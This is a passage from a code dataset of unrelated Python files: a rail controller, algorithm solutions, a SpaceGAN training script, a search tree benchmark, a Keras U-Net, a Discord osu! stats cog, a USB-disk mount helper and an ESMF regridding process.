from_rail_data_frame.iloc[i]['Connection']==to_rail_data_frame.iloc[j]['Connection']:\n distance=abs(from_rail_data_frame.iloc[i]['Distance in Kms']-to_rail_data_frame.iloc[j]['Distance in Kms'])\n response_message={\"from\":from_station_code,\"to\":to_station_code,\"Distance in Kms\":round(distance,2),\"Connection\":to_rail_data_frame.iloc[j]['Connection']}\n response_message_list.append(response_message)\n \n\n if len(response_message_list)==0:\n return SharedResponse.common_line_not_found_error_response()\n \n return SharedResponse.success_response(response_message)\n \n\n except Exception as err:\n logger.error(err)\n traceback.print_exc()\n return SharedResponse.server_error_response()\n \n","sub_path":"src/controller/rail_controller.py","file_name":"rail_controller.py","file_ext":"py","file_size_in_byte":3828,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"173161855","text":"class Solution:\n def canJump(self, nums):\n \"\"\"\n :type nums: List[int]\n :rtype: bool\n \"\"\"\n leftest = len(nums) - 1\n for i in range(len(nums) - 2, -1, -1):\n if i + nums[i] >= leftest:\n leftest = i\n return leftest == 0\n","sub_path":"0055_JumpGame.py","file_name":"0055_JumpGame.py","file_ext":"py","file_size_in_byte":294,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"487210668","text":"import matplotlib\nmatplotlib.use('Agg')\n\nimport pandas as pd\nimport numpy as np\nimport esda\n# import pysal\nimport libpysal\nimport torch\nimport torch.nn as nn\nfrom sklearn.preprocessing import StandardScaler, MinMaxScaler, RobustScaler, QuantileTransformer\nimport matplotlib.pyplot as plt\nimport matplotlib.cm as cm\n# from IPython.display import display, clear_output\nimport warnings\n\nwarnings.simplefilter(\"ignore\")\nimport pdb\nimport sys\nsys.path.append('src')\nfrom spacegan_method import SpaceGAN\nfrom spacegan_selection import get_spacegan_config, compute_metrics\nfrom spacegan_utils import gaussian, rmse, mad, pearsoncorr, mie, moranps, mase_1, mape, smape, eool, msis_1, get_neighbours_featurize\nfrom spacegan_config import Generator, Discriminator\n\n# %matplotlib inline\nfig_save_prefix = 'img/'\n\n# dataset\ndf = pd.read_csv(\"data/raw_data.csv\",nrows=101) # already dropped position_key column\ncoord_vars = [\"longitude\", \"latitude\"] #Define spatial coordinates\ncond_vars = ['unix_time', 'depth', 'conductivity', 'density', 'temperature'] + coord_vars #Define the predictor variables\ncont_vars = ['unix_time', 'depth', 'conductivity', 'density', 'temperature', 'salinity'] + coord_vars #Define which neighbour features to use as context variables\noutput_vars = ['salinity'] #Define output...just to see if it works\nneighbours = 50\n\n# plotting observed house value distrubution at lon-lat location\nfig, ax1 = plt.subplots(1, 1, figsize=(7, 5))\ngen_seq = df[[\"salinity\"]].values.astype(float)\nnorm_gan_mean = (gen_seq - min(gen_seq)) / (max(gen_seq) - min(gen_seq))\ncolors = cm.rainbow(norm_gan_mean)\n\n# plotting\nfor lat, long, c in zip(df[\"latitude\"], df[\"longitude\"], colors):\n ax1.scatter(lat, long, color=c, s=5) # s denotes marker size\n \nax1.set_xlabel(r'$c^{(1)}$', fontsize=14)\nax1.set_ylabel(r'$c^{(2)}$', fontsize=14)\nax1.set_title(\"Observed\")\nfig.savefig(fig_save_prefix+'p1_noaa.png')\n\n\n\n# problem configuration\nprob_config = {\"epochs\": 3000,\n \"batch_size\": 100,\n \"device\": torch.device(\"cuda\"),\n \"cond_dim\": len(cond_vars) + (neighbours * len(cont_vars)), # conditional information size\n \"output_dim\": len(output_vars), # size of output\n \"noise_dim\": len(cond_vars) + (neighbours * len(cont_vars)), # size of noise\n \"noise_type\": gaussian, # type of noise and dimension used\n \"noise_params\": None, # other params for noise (loc, scale, etc.) pass as a dict\n \"scale_x\": StandardScaler(), # a sklearn.preprocessing scaling method\n \"scale_y\": StandardScaler(), # a sklearn.preprocessing scaling method\n \"print_results\": False,\n # additional Generator params\n \"gen_opt\": torch.optim.SGD,\n \"gen_opt_params\": {\"lr\": 0.01},\n # additional Discriminator params\n \"disc_opt\": torch.optim.SGD,\n \"disc_opt_params\": {\"lr\": 0.01},\n # loss function\n \"adversarial_loss\": torch.nn.BCELoss()\n }\n\n# checkpointing configuration\ncheck_config = {\n \"check_interval\": 100, # for model checkpointing\n \"generate_image\": False,\n \"n_samples\": 50,\n \"perf_metrics\": {\"RMSE\": rmse,\n \"MIE\": mie,\n },\n \"pf_metrics_setting\": {\n \"RMSE\": {\"metric_level\": \"agg_metrics\",\n \"rank_function\": np.argmin,\n \"agg_function\": lambda x: np.array(x)\n },\n \"MIE\": {\"metric_level\": \"agg_metrics\",\n \"rank_function\": np.argmin,\n \"agg_function\": lambda x: np.array(x)\n },\n },\n \"agg_funcs\": {\"avg\": np.mean,\n \"std\": np.std\n },\n \"sample_metrics\": False,\n \"agg_metrics\": True\n}\n\nmodel_save_prefix = 'saved_models/noaa/'\n\n# train the model\n\n# neighbours\ndf, neighbour_list = get_neighbours_featurize(df, coord_vars, cont_vars, neighbours)\n\n# data structures\ntarget = df[output_vars].values\ncond_input = df[cond_vars + neighbour_list].values\ncoord_input = df[coord_vars].values\nprob_config[\"output_labels\"] = output_vars\nprob_config[\"input_labels\"] = cond_vars + neighbour_list\n\n# pre-instantiation\ndisc_method = Discriminator(prob_config[\"output_dim\"], prob_config[\"cond_dim\"])\ndisc_method.to(prob_config[\"device\"])\ngen_method = Generator(prob_config[\"cond_dim\"], prob_config[\"noise_dim\"], prob_config[\"output_dim\"])\ngen_method.to(prob_config[\"device\"])\n\n# training SpaceGAN\nspacegan = SpaceGAN(prob_config, check_config, disc_method, gen_method)\nspacegan.train(x_train=cond_input, y_train=target, coords=coord_input)\n\n# export final model and data\nspacegan.checkpoint_model(spacegan.epochs) \nspacegan.df_losses.to_pickle(model_save_prefix+\"grid_spaceganlosses.pkl.gz\")\n\n\n\n# pick the best Generator (G) as determined by the MIE and the RMSE criterion.\n\n# computing metrics\ngan_metrics = compute_metrics(target, cond_input, prob_config, check_config, coord_input, neighbours)\n\n# selecting and sampling gan\nfor criteria in list(check_config[\"perf_metrics\"].keys()):\n # find best config\n criteria_info = check_config[\"pf_metrics_setting\"][criteria]\n perf_metrics = gan_metrics[criteria_info[\"metric_level\"]]\n perf_values = criteria_info[\"agg_function\"](perf_metrics[[criteria]])\n best_config = perf_metrics.index[criteria_info[\"rank_function\"](perf_values)]\n\n # get and set best space gan\n best_spacegan = get_spacegan_config(int(best_config), prob_config, check_config, cond_input, target)\n # training samples\n gan_samples_df = pd.DataFrame(index=range(cond_input.shape[0]), columns=cond_vars + neighbour_list + output_vars)\n gan_samples_df[cond_vars + neighbour_list] = cond_input\n gan_samples_df[output_vars] = target\n for i in range(check_config[\"n_samples\"]):\n gan_samples_df[\"sample_\" + str(i)] = best_spacegan.predict(gan_samples_df[cond_vars + neighbour_list])\n\n # export results\n gan_samples_df.to_pickle(model_save_prefix+\"grid_\" + criteria + \".pkl.gz\")\ngan_metrics[\"agg_metrics\"].to_pickle(model_save_prefix+\"grid_checkmetrics.pkl.gz\")\n\n\n\n# plot the results!\n\n# show highlights\nfig, (ax1, ax2) = plt.subplots(1, 2, figsize=(15, 5))\ngan_metrics[\"agg_metrics\"].plot(ax=ax1)\n\n# generate chart\ngen_seq = gan_samples_df[[\"sample_\" + str(x) for x in range(50)]].mean(axis=1)\nnorm_gan_mean = (gen_seq - min(gen_seq)) / (max(gen_seq) - min(gen_seq))\ncolors = cm.rainbow(norm_gan_mean)\n\n# plotting\nfor lat, long, c in zip(df[\"latitude\"], df[\"longitude\"], colors):\n ax2.scatter(lat, long, color=c, s=5)\nax2.set_xlabel(r'$c^{(1)}$', fontsize=14)\nax2.set_ylabel(r'$c^{(2)}$', fontsize=14)\nax2.set_title(\"SpaceGAN - Best \" + criteria)\nfig.savefig(fig_save_prefix+'p2_noaa.png')\n\n\n# plot the best generator after RMSE selection\n\n#load rmse selection results\ngan_samples_df = pd.read_pickle(model_save_prefix+\"grid_RMSE.pkl.gz\")\n# gan_samples_df = pd.read_pickle(\"./grid_RMSE.pkl.gz\") \n\n# show highlights\nfig, (ax1, ax2) = plt.subplots(1, 2, figsize=(15, 5))\ngan_metrics[\"agg_metrics\"].plot(ax=ax1)\n\n# generate chart\ngen_seq = gan_samples_df[[\"sample_\" + str(x) for x in range(20)]].mean(axis=1)\nnorm_gan_mean = (gen_seq - min(gen_seq)) / (max(gen_seq) - min(gen_seq))\ncolors = cm.rainbow(norm_gan_mean)\n\n# plotting\nfor lat, long, c in zip(df[\"latitude\"], df[\"longitude\"], colors):\n ax2.scatter(lat, long, color=c, s=5)\nax2.set_xlabel(r'$c^{(1)}$', fontsize=14)\nax2.set_ylabel(r'$c^{(2)}$', fontsize=14)\nax2.set_title(\"SpaceGAN - Best RMSE\")\nfig.savefig(fig_save_prefix+'p3_noaa.png')\n\n\n# selection\n\n# iteration = 8000\niteration = 1000\n\n# get and set best space gan\niter_spacegan = get_spacegan_config(iteration, prob_config, check_config, cond_input, target)\n\n# training samples\ngan_samples_df = pd.DataFrame(index=range(cond_input.shape[0]), columns=cond_vars + neighbour_list + output_vars)\ngan_samples_df[cond_vars + neighbour_list] = cond_input\ngan_samples_df[output_vars] = target\nfor i in range(check_config[\"n_samples\"]):\n # gan_samples_df[\"sample_\" + str(i)] = iter_spacegan.predict(gan_samples_df[cond_vars + neighbour_list])\n gan_samples_df[\"sample_\" + str(i)] = iter_spacegan.predict(cond_input)\n\n# generate chart\nfig, ax1 = plt.subplots(1, 1, figsize=(7, 5))\ngen_seq = gan_samples_df[[\"sample_\" + str(x) for x in range(1)]].mean(axis=1)\nnorm_gan_mean = (gen_seq - min(gen_seq)) / (max(gen_seq) - min(gen_seq))\ncolors = cm.rainbow(norm_gan_mean)\n\n# plotting\nfor lat, long, c in zip(df[\"latitude\"], df[\"longitude\"], colors):\n ax1.scatter(lat, long, color=c, s=5)\nax1.set_xlabel(r'$c^{(1)}$', fontsize=14)\nax1.set_ylabel(r'$c^{(2)}$', fontsize=14)\nax1.set_title(\"SpaceGAN (RMSE) - Iteration \" + str(iteration))\nfig.savefig(fig_save_prefix+'p4_noaa.png')\n\n\n\n\n# iteration = 8000\niteration = 1000\n\n# get and set best space gan\niter_spacegan = get_spacegan_config(iteration, prob_config, check_config, cond_input, target)\n\n#load mie selection results\n# gan_samples_df = pd.read_pickle(model_save_prefix+\"grid_MIE.pkl.gz\") #is this line not needed??\n# gan_samples_df = pd.read_pickle(\"./grid_MIE.pkl.gz\") \n\n# training samples\ngan_samples_df = pd.DataFrame(index=range(cond_input.shape[0]), columns=cond_vars + neighbour_list + output_vars)\ngan_samples_df[cond_vars + neighbour_list] = cond_input\ngan_samples_df[output_vars] = target\nfor i in range(check_config[\"n_samples\"]):\n gan_samples_df[\"sample_\" + str(i)] = iter_spacegan.predict(cond_input)\n \n# generate chart\nfig, ax1 = plt.subplots(1, 1, figsize=(7, 5))\ngen_seq = gan_samples_df[[\"sample_\" + str(x) for x in range(1)]].mean(axis=1)\nnorm_gan_mean = (gen_seq - min(gen_seq)) / (max(gen_seq) - min(gen_seq))\ncolors = cm.rainbow(norm_gan_mean)\n\n# plotting\nfor lat, long, c in zip(df[\"latitude\"], df[\"longitude\"], colors):\n ax1.scatter(lat, long, color=c, s=5)\nax1.set_xlabel(r'$c^{(1)}$', fontsize=14)\nax1.set_ylabel(r'$c^{(2)}$', fontsize=14)\nax1.set_title(\"SpaceGAN (MIE) - Iteration \" + str(iteration))\nfig.savefig(fig_save_prefix+'p5_noaa.png')\n\n\n\n\n#Load loss data\nloss_df = pd.read_pickle(model_save_prefix+\"grid_spaceganlosses.pkl.gz\")\n# loss_df = pd.read_pickle(\"./grid_spaceganlosses.pkl.gz\")\n\n#Plot losses and selection criteria side by side\nfig, (ax1, ax2) = plt.subplots(1, 2, figsize=(15, 5))\n\nloss_df.plot(ax=ax1,alpha=0.7)\nax1.set_title(\"Generator and Discriminator loss during training\")\n\ngan_metrics_norm = gan_metrics[\"agg_metrics\"]\ngan_metrics_norm[\"RMSE\"] = 2 - (np.array(gan_metrics_norm[\"RMSE\"]) / max(np.array(gan_metrics_norm[\"RMSE\"]))) #Normalize RMSE metric for better comparison\ngan_metrics_norm.plot(ax=ax2)\nax2.set_title(\"Selection criteria during training\")\nfig.savefig(fig_save_prefix+'p6_noaa.png')\n","sub_path":"toy_noaa.py","file_name":"toy_noaa.py","file_ext":"py","file_size_in_byte":10691,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"142481385","text":"from bst import BST\nfrom avl import AVL\nfrom rb import RedBlackTree\nfrom string import ascii_letters\nfrom random import seed, shuffle, choices\nimport itertools\nfrom collections import defaultdict\nfrom time import time\nimport tracemalloc\n\nseed(714)\n\n\ndef get_random_string(n):\n arr = choices(ascii_letters, k=n)\n return \"\".join(arr)\n\n\ndef get_key_list(key_type, num_of_key):\n key_list = []\n if key_type == \"int\":\n for i in range(1, num_of_key + 1):\n key_list.append(i)\n else:\n n = 52\n for i in range(1, n + 1):\n for i, item in enumerate(itertools.product(ascii_letters, repeat=i)):\n key_list.append(item)\n if len(key_list) == num_of_key:\n break\n if len(key_list) == num_of_key:\n break\n return key_list\n\n\ndef get_val_list(val_size, num_of_key):\n val_list = []\n for i in range(num_of_key):\n val_list.append(get_random_string(val_size))\n return val_list\n\n\ndef perform_benchmark_insert(tree_list, key_list, val_list, time_dict):\n for tree in tree_list:\n time1 = time()\n for i in range(len(key_list)):\n ret = tree.insert(key_list[i], data=val_list[i])\n assert ret is True\n time2 = time()\n time_dict[\"insert\"][tree.__class__.__name__] = time2 - time1\n\n\ndef perform_benchmark_search(tree_list, key_list, val_list, time_dict):\n for tree in tree_list:\n time1 = time()\n for i in range(len(key_list)):\n ret, att = tree.search(key_list[i])\n assert ret is True and att['data'] == val_list[i]\n time2 = time()\n time_dict[\"search\"][tree.__class__.__name__] = time2 - time1\n\n\ndef perform_benchmark_search_update(tree_list, key_list, val_list, time_dict, new_list):\n for tree in tree_list:\n time1 = time()\n for i in range(len(key_list)):\n ret, att = tree.search(key_list[i])\n assert ret is True and att['data'] == val_list[i]\n ret = tree.update(key_list[i], data=new_list[i])\n assert ret is True\n time2 = time()\n time_dict[\"search_update\"][tree.__class__.__name__] = time2 - time1\n\n\ndef perform_benchmark_delete(tree_list, key_list, val_dict, time_dict):\n for tree in tree_list:\n time1 = time()\n for i in range(len(key_list)):\n ret, att = tree.delete(key_list[i])\n assert ret is True and att['data'] == val_dict[key_list[i]]\n time2 = time()\n time_dict[\"delete\"][tree.__class__.__name__] = time2 - time1\n\n\ndef perform_benchmark(key_type, num_of_key, val_size,\n insert_type, search_type,\n search_update_type, delete_type):\n tree_list = [BST(), AVL(), RedBlackTree()]\n key_list, val_list = get_key_list(key_type, num_of_key), get_val_list(val_size, num_of_key)\n new_val_list = get_val_list(val_size, num_of_key)\n zip_key_val = list(zip(key_list, val_list))\n shuffle(zip_key_val)\n ran_key_list, ran_val_list = zip(*zip_key_val)\n zip_key_val = []\n time_dict = defaultdict(lambda: {})\n if insert_type == \"seq\":\n perform_benchmark_insert(tree_list, key_list, val_list, time_dict)\n else:\n perform_benchmark_insert(tree_list, ran_key_list, ran_val_list, time_dict)\n if search_type == \"seq\":\n perform_benchmark_search(tree_list, key_list, val_list, time_dict)\n else:\n perform_benchmark_search(tree_list, ran_key_list, ran_val_list, time_dict)\n if search_update_type == \"seq\":\n perform_benchmark_search_update(tree_list, key_list, val_list, time_dict, new_val_list)\n new_val_dict = {}\n for i, key in enumerate(key_list):\n new_val_dict[key] = new_val_list[i]\n else:\n perform_benchmark_search_update(tree_list, ran_key_list, ran_val_list, time_dict, new_val_list)\n new_val_dict = {}\n for i, key in enumerate(ran_key_list):\n new_val_dict[key] = new_val_list[i]\n val_list = []\n ran_val_list = []\n # at this step, the data in the tree has been replaced to data in new_val_list\n if delete_type == \"seq\":\n perform_benchmark_delete(tree_list, key_list, new_val_dict, time_dict)\n else:\n perform_benchmark_delete(tree_list, ran_key_list, new_val_dict, time_dict)\n\n return time_dict\n\n\ndef validate_parameters(key_type, num_of_key, val_size,\n insert_type, search_type,\n search_update_type, delete_type):\n assert key_type in [\"int\", \"str\"]\n assert 0 < num_of_key <= 1600000\n assert 0 < val_size <= 1024\n for i in (insert_type, search_type, search_update_type, delete_type):\n assert i in [\"seq\", \"ran\"]\n\n\ndef print_parameters(key_type, num_of_key, val_size,\n insert_type, search_type,\n search_update_type, delete_type):\n result_str = (f\"key_type \\t{key_type} \\n\"\n f\"num_of_key \\t{num_of_key} \\n\"\n f\"val_size \\t{val_size} \\n\"\n f\"insert_type \\t{insert_type} \\n\"\n f\"search_type \\t{search_type} \\n\"\n f\"search_update_type \\t{search_update_type}\\n\"\n f\"delete_type \\t{delete_type} \\n\")\n return result_str\n\n\ndef benchmark_main(key_type, num_of_key, val_size,\n insert_type, search_type,\n search_update_type, delete_type):\n validate_parameters(key_type, num_of_key, val_size,\n insert_type, search_type,\n search_update_type, delete_type)\n time_dict = perform_benchmark(key_type, num_of_key, val_size,\n insert_type, search_type,\n search_update_type, delete_type)\n return time_dict\n\n\ndef benchmark_main_wrapper(key_type, num_of_key, val_size,\n insert_type, search_type,\n search_update_type, delete_type):\n # p = print_parameters(key_type, num_of_key, val_size,\n # insert_type, search_type,\n # search_update_type, delete_type)\n tracemalloc.start()\n time_dict = benchmark_main(key_type, num_of_key, val_size,\n insert_type, search_type,\n search_update_type, delete_type)\n snapshot = tracemalloc.take_snapshot()\n top_stats = snapshot.statistics('lineno')\n\n # return time_dict\n return time_dict, top_stats\n\n\ndef print_td(td):\n for k, k_dict in td.items():\n print(k)\n # print()\n for tree, time in k_dict.items():\n print(\"\\t\", tree, \"\\t\", time)\n # print(time)\n\n\nif __name__ == '__main__':\n for sz in [32, 64, 256, 512, 1024]:\n td, ts = benchmark_main_wrapper(\"str\", 100, sz, \"ran\", \"ran\", \"ran\", \"ran\")\n print_td(td)\n","sub_path":"web/impl/bmk.py","file_name":"bmk.py","file_ext":"py","file_size_in_byte":6960,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"133108589","text":"import tensorflow as tf\nimport numpy as np\nfrom tensorflow.keras.models import Model, load_model\nfrom tensorflow.keras.layers import Input, Concatenate\nfrom tensorflow.keras.layers import Conv2D, MaxPool2D, BatchNormalization\nfrom tensorflow.keras.layers import Dropout, Activation, UpSampling2D\n\ndef conv_block(filters, x):\n x = Conv2D(filters=filters, \n kernel_size=(3,3), \n padding='valid', \n activation='relu')(x)\n\n x = BatchNormalization()(x)\n\n x = Conv2D(filters=filters, \n kernel_size=(3,3), \n padding='valid', \n activation='relu')(x)\n out = BatchNormalization()(x)\n return out \n\n\ndef down_sample(filters, x):\n x = MaxPool2D((2,2))(x)\n out = conv_block(filters, x)\n return out\n\n\ndef up_sample(filters, x, x1):\n x = UpSampling2D((2, 2))(x)\n x = Concatenate()(x1, x)\n out = conv_block(filters, x)\n\nclass Unet(Model):\n def __init__(self):\n super(Unet, self).__init__()\n pool = MaxPool2D((2,2))\n def call(self, x):\n # Encoder \n print(x)\n down1 = conv_block(64, x)\n down2 = down_sample(128, down1)\n down3 = down_sample(256, down2)\n down4 = down_sample(512, down3)\n down5 = down_sample(1024, down4)\n\n # Decoder\n up1 = up_sample(512, down5, down4)\n up2 = up_sample(256, up1, down3)\n up3 = up_sample(128, up2, down2)\n up4 = up_sample(64, up3, down1)\n\n out = Conv2D(filters=1, \n kernel_size=(1,1),\n padding='valid',\n activation='sigmoid')\n\n return out\n\nimage = np.zeros((1, 572, 572, 3))\nimg_tensor = tf.image.convert_image_dtype(image, dtype=tf.float16)\n\nmodel = Unet()\nmodel(img_tensor)\nmodel.compile(optimizer='adam', loss='binary_crossentropy', metrics=['accuracy'])\nmodel.summary()\n\n\n \n\n\n","sub_path":"Deep Learning/CNN/Unet/model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":1896,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"439627199","text":"import numpy\n\nimport scipy\nimport scipy.linalg\nimport scipy.special\nimport scipy.ndimage\n\nimport cupy\n\nimport cupyx.scipy\nimport cupyx.scipy.linalg\nimport cupyx.scipy.ndimage\nimport cupyx.scipy.special\n\n\ndef _get_functions(obj):\n return set([\n n for n in dir(obj)\n if (n not in ['test'] # not in blacklist\n and callable(getattr(obj, n)) # callable\n and not isinstance(getattr(obj, n), type) # not class\n and n[0].islower() # starts with lower char\n and not n.startswith('__') # not special methods\n )\n ])\n\n\ndef _generate_comparison_rst(base_obj, cupy_obj, base_type):\n base_funcs = _get_functions(eval(base_obj))\n cp_funcs = _get_functions(eval(cupy_obj))\n\n buf = []\n buf += [\n '.. csv-table::',\n ' :header: {}, CuPy'.format(base_type),\n '',\n ]\n for f in sorted(base_funcs):\n if f in cp_funcs:\n line = r' :obj:`{0}.{1}`, :obj:`{2}.{1}`'.format(\n base_obj, f, cupy_obj)\n else:\n line = r' :obj:`{0}.{1}`, \\-'.format(base_obj, f)\n buf.append(line)\n\n buf += [\n '',\n '.. Summary:',\n ' Number of NumPy functions: {}'.format(len(base_funcs)),\n ' Number of functions covered by CuPy: {}'.format(\n len(cp_funcs & base_funcs)),\n ' CuPy specific functions:',\n ] + [\n ' - {}'.format(f) for f in (cp_funcs - base_funcs)\n ]\n return buf\n\n\ndef _section(header, base_obj, cupy_obj, base_type='NumPy'):\n return [\n header,\n '~' * len(header),\n '',\n ] + _generate_comparison_rst(base_obj, cupy_obj, base_type) + [\n '',\n ]\n\n\ndef generate():\n buf = []\n\n buf += [\n 'NumPy / CuPy APIs',\n '-----------------',\n '',\n ]\n buf += _section(\n 'Module-Level',\n 'numpy', 'cupy')\n buf += _section(\n 'Multi-Dimensional Array',\n 'numpy.ndarray', 'cupy.ndarray')\n buf += _section(\n 'Linear Algebra',\n 'numpy.linalg', 'cupy.linalg')\n buf += _section(\n 'Discrete Fourier Transform',\n 'numpy.fft', 'cupy.fft')\n buf += _section(\n 'Random Sampling',\n 'numpy.random', 'cupy.random')\n\n buf += [\n 'SciPy / CuPy APIs',\n '-----------------',\n '',\n ]\n buf += _section(\n 'Sparse Matrices',\n 'scipy.sparse', 'cupyx.scipy.sparse', 'SciPy')\n buf += _section(\n 'Sparse Linear Algebra',\n 'scipy.linalg', 'cupyx.scipy.linalg', 'SciPy')\n buf += _section(\n 'Multidimensional Image Processing',\n 'scipy.ndimage', 'cupyx.scipy.ndimage', 'SciPy')\n buf += _section(\n 'Special Functions',\n 'scipy.special', 'cupyx.scipy.special', 'SciPy')\n\n return '\\n'.join(buf)\n","sub_path":"docs/source/_comparison_generator.py","file_name":"_comparison_generator.py","file_ext":"py","file_size_in_byte":2807,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"507210564","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Fri May 31 17:34:15 2019\n\n@author: John\n\"\"\"\n\n#%% Ejercicio 3: Eigenvalor dominante (1er valor propio) de una matriz.\n\nfrom numpy import linalg as lng\nimport numpy as np\n\ndef maxEigValue(A, x0, tol):\n x = A*x0\n d = np.max(np.abs(x))\n x = np.divide(x, d)\n \n while (lng.norm(x - x0) > tol):\n x0 = x\n x = A*x0\n d = np.max(np.abs(x))\n x = np.divide(x, d)\n \n d = np.round(d, 2)\n x = np.round(x, 2)\n \n return d, x\n\n\nD = np.matrix([[1,-3,8],[2,-5,9],[3,-6,10]], 'float')\n\nx0 = np.ones((3,1))\ntol = 1e-3\n\nd, x, = maxEigValue(D, x0, tol)\n\nX = lng.eig(D)\nnp.round(np.real(np.max(X[0])),2)\n\nprint(f\"El valor propio d = {d}, coincide con el calculado por \" +\n f\"eig(D) = {np.round(np.real(np.max(X[0])),2)}.\")\n\n# Observación: en lugar de indicar el número de iteraciones, estas son\n# definidas por el programa de acuerdo a la comparación entre la\n# tolerancia y la aproximación (diferencia) entre el valor\n# calculado para x y el de la iteración anterior.\n# Esto se hace para evitar gastar ciclos innecesariamente cuando\n# se busca un decimal de precisión en el resultado.","sub_path":"Ejercicio 3.py","file_name":"Ejercicio 3.py","file_ext":"py","file_size_in_byte":1232,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"613126036","text":"from discord.ext import commands\nfrom time import time\nimport discord\n\n\nclass Osu(commands.Cog):\n def __init__(self, bot):\n self.bot = bot\n self.baseurl = 'https://lemmmy.pw/osusig/sig.php?'\n\n @commands.guild_only()\n @commands.command(aliases=['osu'])\n async def osustats(self, ctx, *, osuplayer: str = None):\n if not osuplayer:\n embed = discord.Embed(\n description=\"**\" + ctx.author.name +\n \"** you need to tell me a username!\",\n color=0xff0000)\n await ctx.send(embed=embed)\n else:\n embed = discord.Embed(color=0x00ff00)\n embed.set_author(\n name=f\"{osuplayer}'s Stats\",\n url=f\"https://osu.ppy.sh/u/{osuplayer}\",\n icon_url=\"https://s.ppy.sh/images/head-logo.png\")\n embed.set_footer(text=\"Osu stats\")\n query = (\n f'colour=hexff66aa&uname={osuplayer}&pp=1&countryrank'\n '&flagshadow&flagstroke&opaqueavatar&avatarrounding=5&'\n f'onlineindicator=undefined&xpbar&xpbarhex&random={time()}')\n\n embed.set_image(url=f'{self.baseurl}{query}')\n print(f'{self.baseurl}{query}')\n await ctx.send(embed=embed)\n\n\ndef setup(bot):\n bot.add_cog(Osu(bot))\n","sub_path":"cogs/osu.py","file_name":"osu.py","file_ext":"py","file_size_in_byte":1314,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"175069014","text":"import os\nimport contextlib\nimport time\nfrom inaugurator import sh\n\n\nclass DiskOnKey:\n _MOUNT_POINT = \"/sourceDOK\"\n\n def __init__(self):\n self._device = self._findDevice()\n self._partiton = self._device + \"1\"\n\n @contextlib.contextmanager\n def mount(self):\n os.makedirs(self._MOUNT_POINT)\n sh.run(\"busybox modprobe vfat\")\n sh.run(\"/usr/sbin/busybox mount -t vfat -o ro %s %s\" % (\n self._partiton, self._MOUNT_POINT))\n yield self._MOUNT_POINT\n sh.run(\"/usr/sbin/busybox umount %s\" % self._MOUNT_POINT)\n\n def _findDevice(self):\n sh.run(\"busybox modprobe usb_storage\")\n for i in xrange(10):\n try:\n return self._findDeviceOnce()\n except:\n time.sleep(1)\n sh.run(\"/usr/sbin/busybox mdev -s\")\n return self._findDeviceOnce()\n\n def _findDeviceOnce(self):\n for letter in ['a', 'b', 'c', 'd', 'e', 'f']:\n candidate = \"/dev/sd%s\" % letter\n if not os.path.exists(candidate):\n continue\n if self._deviceSizeGB(candidate) > 32:\n continue\n return candidate\n raise Exception(\"Unable to find a device that looks like a DOK\")\n\n def _deviceSizeGB(self, device):\n return int(sh.run(\"sfdisk -s %s\" % device)) / 1024 / 1024\n","sub_path":"inaugurator/diskonkey.py","file_name":"diskonkey.py","file_ext":"py","file_size_in_byte":1363,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"262203551","text":"# TODO: Rename this file \"wps_esmf_process\"\nimport logging\nimport os\n\nimport ESMF\nimport ocgis\nfrom eggshell.log import init_process_logger\nfrom pywps import ComplexInput, ComplexOutput\nfrom pywps import Format, configuration, get_format\nfrom pywps import LiteralInput\nfrom pywps import Process\nfrom pywps.app.Common import Metadata\n\nfrom flyingpigeon.utils import archiveextract\nfrom flyingpigeon.utils import rename_complexinputs\n\nLOGGER = logging.getLogger(\"PYWPS\")\n\njson_format = get_format('JSON')\n\n# Supported interpolation methods\nmethods = list(map(str.lower, ESMF.RegridMethod.__members__.keys()))\n\n\ndef extract_doc():\n \"\"\"Format the documentation about the ESMF regridding methods.\"\"\"\n import inspect\n import re\n\n source = inspect.getsource(ESMF.RegridMethod)\n doc = source.replace('\"\"\"', '')\n\n def title(match):\n [name] = match.groups()\n n = len(name)\n return '\\n ' + name + '\\n ' + n * '~'\n\n doc = re.sub('(\\w+) = \\d', title, doc)\n lines = doc.splitlines()[3:]\n lines.insert(0, ' Notes')\n lines.insert(1, ' -----')\n\n return '\\n'.join(lines)\n\n\ndef actual_output_path(fn):\n \"\"\"Return the path to an output file, adjusting for whether or not the server is active or not.\n\n Example\n -------\n On a local server it would yield something like::\n\n http://localhost:8090/wpsoutputs/flyingpigeon/af06fb/af06fb.nc\n\n While in test mode it would yield::\n\n file:///tmp/af06fb/af06fb.nc\n\n \"\"\"\n outputurl = configuration.get_config_value('server', 'outputurl')\n outputpath = configuration.get_config_value('server', 'outputpath')\n\n return os.path.join(outputurl, os.path.relpath(fn, outputpath))\n\n\nclass ESMFRegridProcess(Process):\n \"\"\"\n Notes\n -----\n\n Bilinear\n Destination value is a linear combination of the\n source values in the cell which contains the destination point. The weights\n for the linear combination are based on the distance of the destination\n point from each source value.\n\n Patch\n Higher-order patch recovery interpolation. Destination value is a weighted\n average of 2D polynomial patches constructed from cells surrounding the\n source cell which contains the destination point. This method typically\n results in better approximations to values and derivatives than bilinear.\n However, because of its larger stencil, it also results in a much larger\n interpolation matrix than the bilinear method.\n\n Conserve\n First order conservative interpolation. Value of a destination cell is the\n weighted sum of the values of the source cells that it overlaps. The\n weights are determined by the amount the source cell overlaps the\n destination cell. This method will typically give less accurate\n approximations to values than the other interpolation methods, however, it\n will do a much better job preserving the integral of the value between the\n source and destination. This method requires the corner coordinate values\n to be provided in the Grid, and it currently only works for Fields created\n on the Grid center stagger (or the Mesh element location).\n\n Nearest_STOD\n In this version of nearest neighbor interpolation each destination point is\n mapped to the closest source point. A given source point may go to multiple\n destination points, but no destination point will receive input from more\n than one source point.\n\n Nearest_DTOS\n In this version of nearest 